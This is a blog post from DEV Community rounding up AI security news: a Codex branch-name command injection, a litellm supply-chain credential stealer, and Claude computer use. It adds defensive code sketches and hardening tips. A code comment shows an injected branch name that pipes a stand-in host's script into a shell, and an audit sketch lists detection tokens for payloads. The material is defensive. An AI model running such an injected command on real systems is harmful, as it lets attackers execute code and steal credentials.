DEV Community

Not Elon


This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control

This was the week AI security stopped being theoretical.

Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.

1. OpenAI Codex: Command Injection via Branch Names

BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.

The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.
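The write-up doesn't include Codex's internal code, but the underlying bug class is familiar. A minimal sketch of the pattern, assuming a tool that shells out to git with a user-controlled branch name (all function names here are illustrative, not OpenAI's):

```python
import re
import subprocess

def checkout_unsafe(branch: str) -> None:
    # VULNERABLE (illustrative): the branch name is interpolated into a shell
    # string, so a name like 'x; curl evil.example | sh' runs arbitrary code.
    subprocess.run(f"git checkout {branch}", shell=True, check=True)

def is_valid_branch(branch: str) -> bool:
    # Conservative allowlist: must start with an alphanumeric (blocks names
    # that look like CLI flags), then letters, digits, and a few separators.
    # Real git ref rules are looser, but an allowlist fails closed.
    if ".." in branch:
        return False
    return bool(re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,254}", branch))

def checkout_safe(branch: str) -> None:
    # Safer: validate first, then pass argv as a list so no shell is involved.
    if not is_valid_branch(branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    subprocess.run(["git", "checkout", branch], check=True)
```

The fix is two independent layers: never hand untrusted strings to a shell, and validate branch names against an allowlist before they touch any command at all.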

The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.

OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.

Every AI coding tool that touches git has this same attack surface, and almost nobody is auditing for it.

2. LiteLLM Supply Chain Attack: 47K Downloads in 46 Minutes

On March 24, 2026, litellm version 1.82.8 was published to PyPI with a malicious .pth file that executed automatically on every Python process startup.

The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.
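The .pth trick is worth understanding: at interpreter startup, Python's site module executes any line in a site-packages .pth file that begins with "import", which makes these files a quiet persistence mechanism. A rough sketch of an audit, assuming you just want to flag .pth lines that import-and-execute something network- or exec-shaped (the token list is my own heuristic, not from the Endor Labs analysis):

```python
import site
from pathlib import Path

# Heuristic tokens that rarely belong in a legitimate path-configuration file.
SUSPICIOUS = ("exec(", "eval(", "base64", "urllib", "socket", "subprocess")

def suspicious_pth_lines(pth_text: str) -> list[str]:
    # site.py runs any .pth line starting with "import" at startup,
    # so that's the only place a payload can hide.
    return [
        line
        for line in pth_text.splitlines()
        if line.startswith("import") and any(tok in line for tok in SUSPICIOUS)
    ]

def audit_site_packages() -> dict[str, list[str]]:
    # Walk every site-packages directory and report .pth files whose
    # import lines look like executable payloads rather than path entries.
    report: dict[str, list[str]] = {}
    for d in site.getsitepackages():
        for pth in Path(d).glob("*.pth"):
            hits = suspicious_pth_lines(pth.read_text(errors="ignore"))
            if hits:
                report[str(pth)] = hits
    return report
```

Ordinary .pth files contain bare directory paths and are harmless; anything combining an import line with exec, base64, or network modules deserves a close look.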

The timeline:

  • 13 minutes between the compromised publish and detection
  • 47,000 downloads before the package was pulled
  • 95 million monthly downloads for the litellm package overall

litellm is one of the most widely used AI proxy libraries. If you're routing API calls through it (and many vibe-coded apps do), you were exposed.

Endor Labs just published their analysis showing this is the same attacker behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.

3. Claude Gets Computer Use: The Closed Loop

Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.

The capability is impressive. The security implications are sobering.

With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:

  • Auth middleware actually works
  • API keys are properly scoped
  • Rate limiting is real
  • Environment variables aren't hardcoded
  • The dependencies being installed are legitimate

This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."

The Pattern

All three events share a common thread: trust boundaries in AI development are poorly defined.

  • Codex trusted user-supplied branch names as safe input
  • Vibe coders trusted pip install litellm as a safe operation
  • Claude Computer Use trusts that the code it wrote is correct because the UI loaded

Meanwhile, 9to5Mac reports that vibe coding has broken Apple's App Store review queue. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.

What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.

What You Can Do Today

If you're shipping vibe-coded apps:

  1. Pin your dependencies. Use lockfiles. Verify hashes. Don't pip install without knowing exactly what version you're getting.

  2. Treat AI-generated code as untrusted input. Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.

  3. Scan before shipping. Tools like VibeCheck scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.

  4. Assume your secrets are exposed. If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.

  5. Add rate limiting to every public endpoint. The bots are faster than your users.
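On point 5, rate limiting doesn't need a framework to get started. A minimal token-bucket sketch, framework-agnostic (keep one bucket per client key; the class and parameter names are mine, not from any particular library):

```python
import time

class TokenBucket:
    """Allow `rate` requests/second with bursts up to `capacity`."""

    def __init__(self, rate: float, capacity: int, clock=time.monotonic):
        self.rate = rate
        self.capacity = capacity
        self.clock = clock  # injectable for testing
        self.tokens = float(capacity)
        self.last = clock()

    def allow(self) -> bool:
        # Refill proportionally to elapsed time, capped at capacity,
        # then spend one token if available.
        now = self.clock()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False
```

In practice you'd keep a dict of buckets keyed by API key or client IP and call `allow()` at the top of each handler; production deployments usually move this state into Redis so it survives restarts and scales across instances.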

The AI coding revolution is real. The security crisis is also real. They're the same thing.


I track vibe coding security tools and incidents at notelon.ai. Free scanner, no signup required.
